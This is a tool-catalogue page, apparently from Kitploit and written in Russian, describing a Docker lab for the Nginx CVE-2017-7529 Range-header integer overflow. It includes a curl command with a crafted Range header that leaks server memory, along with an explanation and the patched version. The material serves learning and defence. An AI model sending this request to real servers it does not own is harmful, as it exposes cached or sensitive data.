Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-7529- — Docker-среда для воспроизведения уязвимости целочисленного переполнения Nginx CVE-2017-7529, демонстрирующая раскрытие информации через специально сформированные заголовки Range с пошаговым руководством по эксплуатации. | Kitploit
Инструменты/GitHubGitHub/youngmin0104/cve-2017-7529-
Анализ уязвимостейЭксплуатацияСбор информацииВеб-безопасностьОбучение и ОбразованиеЛаборатории и Практика
GitHubyoungmin0104/cve-2017-7529-

CVE-2017-7529-

Docker-среда для воспроизведения уязвимости целочисленного переполнения Nginx CVE-2017-7529, демонстрирующая раскрытие информации через специально сформированные заголовки Range с пошаговым руководством по эксплуатации.

Репозиторий
141 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2017-7529 - Переполнение целого числа в заголовке Range Nginx

  • Nginx — это высокопроизводительный веб-сервер, обратный прокси, кэширующий сервер и т.д., широко используемый в качестве открытого веб-сервера.
  • В версиях Nginx 1.13.2 и ниже существует уязвимость, вызванная целочисленным переполнением, позволяющая злоумышленнику манипулировать заголовком Range для утечки фрагментов памяти или конфиденциальной информации за пределами исходного диапазона ответа.

Ссылки

  • https://www.freebuf.com/articles/web/140178.html

Настройка уязвимой среды

  • Выполните следующую команду для запуска уязвимой среды Nginx:
bash
docker compose up -d
  • После запуска сервера вы можете получить к нему доступ в браузере по следующему адресу:
arduino
http://your-ip:8080
  • Отобразится стандартная страница Nginx или пользовательская страница index.html.

Воспроизведение уязвимости

  • Используйте команду curl для отправки вредоносного запроса с заголовком Range:
bash
curl -v -H "Range: bytes=-9223372036854,5" http://your-ip:8080/

-> В теле ответа помимо части страницы могут содержаться странные двоичные данные или мусор из памяти.


Краткое объяснение принципа работы

  • Эта уязвимость возникает из-за переполнения при вычислении целых чисел (отрицательных и положительных) при обработке запроса Range, что приводит к включению в ответ областей памяти, которые изначально не предполагались.
  • Благодаря этому злоумышленник может извлечь кэшированные данные или часть конфиденциальной информации.

Заключение

  • Эта уязвимость может привести к раскрытию информации (Information Disclosure) с помощью простого HTTP-запроса.
  • Если в ответе будут содержаться конфиденциальные настройки или другие утекшие данные, это может привести к серьезному инциденту безопасности.
  • Исправление: рекомендуется обновить Nginx до версии 1.13.3 или выше.

Пример структуры файлов

bash

CVE-2017-7529/
├── Dockerfile
├── docker-compose.yml
├── nginx.conf
├── index.html
└── README.md  <-- этот документ
Скачать инструмент